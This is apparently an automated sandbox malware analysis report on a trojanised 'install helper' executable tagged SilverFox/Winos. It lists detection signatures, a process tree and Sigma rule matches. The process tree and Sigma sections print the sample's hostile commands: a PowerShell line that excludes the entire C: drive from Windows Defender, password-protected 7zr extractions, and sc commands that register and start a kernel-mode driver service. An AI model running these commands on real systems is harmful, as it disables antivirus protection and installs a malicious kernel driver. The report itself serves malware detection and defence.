Edit tour

Windows Analysis Report
#U5b89#U88c5#U52a9#U624b2.0.6.exe

Overview

General Information

Sample name:	#U5b89#U88c5#U52a9#U624b2.0.6.exe renamed because original name is a hash value
Original sample name:	2.0.6.exe
Analysis ID:	1580397
MD5:	c5c5262b26879c84d470ef4a5b73663d
SHA1:	c907618ac1db8f8186469e0bcfff2debc0b49fdd
SHA256:	b53886e5499226b7565d65fd25ecd448f82434cac355d799ea2e39e0d822b234
Tags:	exeSilverFoxwinosuser-kafan_shengui
Infos:

Detection

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Contains functionality to hide a thread from the debugger

Found driver which could be used to inject code into processes

Hides threads from debuggers

Loading BitLocker PowerShell Module

PE file contains section with special chars

Protects its processes via BreakOnTermination flag

Query firmware table information (likely to detect VMs)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Enables security privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: New Kernel Driver Via SC.EXE

Sigma detected: Powershell Defender Exclusion

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

#U5b89#U88c5#U52a9#U624b2.0.6.exe (PID: 7764 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.6.exe" MD5: C5C5262B26879C84D470EF4A5B73663D)

#U5b89#U88c5#U52a9#U624b2.0.6.tmp (PID: 7820 cmdline: "C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp" /SL5="$20434,7252309,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.6.exe" MD5: 65559DDD30465F50270FB7E9EE6E6C7C)

powershell.exe (PID: 7836 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 2080 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

#U5b89#U88c5#U52a9#U624b2.0.6.exe (PID: 7920 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.6.exe" /VERYSILENT MD5: C5C5262B26879C84D470EF4A5B73663D)

#U5b89#U88c5#U52a9#U624b2.0.6.tmp (PID: 7996 cmdline: "C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp" /SL5="$30452,7252309,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.6.exe" /VERYSILENT MD5: 65559DDD30465F50270FB7E9EE6E6C7C)

7zr.exe (PID: 8108 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)

conhost.exe (PID: 8124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

7zr.exe (PID: 7220 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)

conhost.exe (PID: 7244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 8076 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 8092 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 8100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7432 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 7452 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7552 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 692 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 4220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2832 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 1004 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 3316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4744 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 3112 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2444 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 1256 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 3732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7728 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 5492 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 5608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 872 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 1912 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 1420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5652 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 2376 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 3556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1592 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 1792 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 1820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2016 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 1992 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 2052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2240 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 3236 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 2508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 316 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 2836 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 3004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7892 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 3240 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 3352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3668 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 5508 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 4324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4144 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 4380 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 4292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 8128 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 4120 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 8096 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 8184 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 8180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 8172 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 8168 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 8156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4932 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 7388 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7288 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 7428 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5972 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 7452 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 1948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1900 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 1380 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 6492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1004 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 5112 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 6592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3628 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 596 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 3112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7860 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 7916 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 8040 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 7728 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7564 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 1256 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7856 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 7852 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 3276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2988 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 5364 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 1420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1616 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 2992 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 3556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1760 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 1820 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 1868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4712 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cleanup

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp" /SL5="$20434,7252309,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.6.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp, ParentProcessId: 7820, ParentProcessName: #U5b89#U88c5#U52a9#U624b2.0.6.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7836, ProcessName: powershell.exe

Sigma detected: New Kernel Driver Via SC.EXE

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8076, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 8092, ProcessName: sc.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: New Service Creation Using Sc.EXE

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8076, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 8092, ProcessName: sc.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp" /SL5="$20434,7252309,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.6.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp, ParentProcessId: 7820, ParentProcessName: #U5b89#U88c5#U52a9#U624b2.0.6.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7836, ProcessName: powershell.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\Windows NT\hrsw.vbc	ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Temp\is-0SINS.tmp\update.vac	ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Temp\is-64MMK.tmp\update.vac	ReversingLabs: Detection: 23%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 93.4% probability

Source: #U5b89#U88c5#U52a9#U624b2.0.6.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: #U5b89#U88c5#U52a9#U624b2.0.6.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.1435045082.0000000001380000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.1434646463.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr

Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CDCB430 FindFirstFileA,FindClose,FindClose,		6_2_6CDCB430
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00756868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,		10_2_00756868

Source: C:\Program Files (x86)\Windows NT\7zr.exe

Code function: 10_2_00757496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,

10_2_00757496

Source: #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000006.00000002.1558338972.000000006CE08000.00000008.00000001.01000000.00000009.sdmp, #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000006.00000002.1552267523.00000000041E5000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000006.00000002.1558338972.000000006CE08000.00000008.00000001.01000000.00000009.sdmp, #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000006.00000002.1552267523.00000000041E5000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000006.00000002.1558338972.000000006CE08000.00000008.00000001.01000000.00000009.sdmp, #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000006.00000002.1552267523.00000000041E5000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000006.00000002.1558338972.000000006CE08000.00000008.00000001.01000000.00000009.sdmp, #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000006.00000002.1552267523.00000000041E5000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000006.00000002.1558338972.000000006CE08000.00000008.00000001.01000000.00000009.sdmp, #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000006.00000002.1552267523.00000000041E5000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000006.00000002.1558338972.000000006CE08000.00000008.00000001.01000000.00000009.sdmp, #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000006.00000002.1552267523.00000000041E5000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000006.00000002.1558338972.000000006CE08000.00000008.00000001.01000000.00000009.sdmp, #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000006.00000002.1552267523.00000000041E5000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000006.00000002.1558338972.000000006CE08000.00000008.00000001.01000000.00000009.sdmp, #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000006.00000002.1552267523.00000000041E5000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000006.00000002.1558338972.000000006CE08000.00000008.00000001.01000000.00000009.sdmp, #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000006.00000002.1552267523.00000000041E5000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000006.00000002.1558338972.000000006CE08000.00000008.00000001.01000000.00000009.sdmp, #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000006.00000002.1552267523.00000000041E5000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr	String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000006.00000002.1558338972.000000006CE08000.00000008.00000001.01000000.00000009.sdmp, #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000006.00000002.1552267523.00000000041E5000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000006.00000002.1558338972.000000006CE08000.00000008.00000001.01000000.00000009.sdmp, #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000006.00000002.1552267523.00000000041E5000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr	String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000006.00000002.1558338972.000000006CE08000.00000008.00000001.01000000.00000009.sdmp, #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000006.00000002.1552267523.00000000041E5000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr	String found in binary or memory: http://ocsp.digicert.com0A
